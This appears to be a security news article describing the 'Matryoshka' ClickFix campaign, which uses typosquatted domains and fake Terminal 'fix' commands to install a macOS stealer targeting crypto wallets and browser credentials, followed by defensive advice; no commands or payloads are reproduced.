A sophisticated social engineering campaign has surfaced that targets macOS users and uses an advanced ClickFix attack technique to deploy a dangerous stealer malware. This variant, called "Matryoshka" after the Russian nesting dolls, conceals malicious code from automated analysis tools and security scanners by using nested obfuscation layers. Find out more Protection against identity theft Network of Zero Trust Get access to solutions Service for vulnerability assessments The attack circumvents the conventional download-and-launch security expectations that many users rely on by tricking victims into running Terminal commands that seem like genuine software fixes.

The campaign targets visitors trying to access software review sites in particular by using typosquatting domains to intercept users who type incorrect addresses for legitimate websites.

After being taken to the fraudulent domain, victims are presented with a phony installation prompt telling them to enter a "fix" command into their macOS Terminal application. After noticing typosquatted domains such as comparisions[. ]org, which imitates the authentic comparisons.org website by adding an extra letter, Intego analysts were able to identify this attack chain.

Matryoshka uses sophisticated evasion techniques intended to make detection more difficult, in contrast to previous ClickFix variants that used readable scripts. Instead of writing clean script files to disk, the malicious payload explodes only in memory, remaining encoded and compressed until it is executed. This method makes basic static analysis more difficult for researchers and drastically lowers visibility for file-based security scanning.

Following successful execution, the loader retrieves an AppleScript payload created especially to target cryptocurrency wallet apps like Trezor Suite and Ledger Live and harvest browser credentials. The malware first tries programmatic credential theft before reverting to phony system dialogs that keep asking for passwords until victims give them. Mechanism of Infection and Evasion Strategies Each step in the Matryoshka infection chain is intended to avoid detection while preserving operational effectiveness.

A shell script with a sizable encoded payload concealed inside a heredoc structure is retrieved by victims when they paste the malicious Terminal command. Find out more Back Software for vulnerability management Software for preventing data loss Through an in-memory pipeline, this payload is decoded and decompressed without producing observable file artifacts.

The loader demonstrates several clever evasion behaviors that help it run unnoticed. It detaches its main routine to the background and exits quickly, making the Terminal prompt return almost immediately so victims believe the process has finished. The script redirects standard input, output, and error streams to suppress visible artifacts in the terminal session.

Additionally, the command-and-control infrastructure requires specific custom headers in requests, responding with generic errors to automated scanners lacking proper credentials. Users should never paste commands from websites into Terminal, as legitimate software updates will not require this action. Organizations should block typosquatting domains, monitor Terminal-initiated execution patterns, and watch for suspicious staging archives or wallet application tampering.

Set ZeroOwl as a Preferred Source in Google and use X, LinkedIn, and LinkedIn to receive more real-time updates.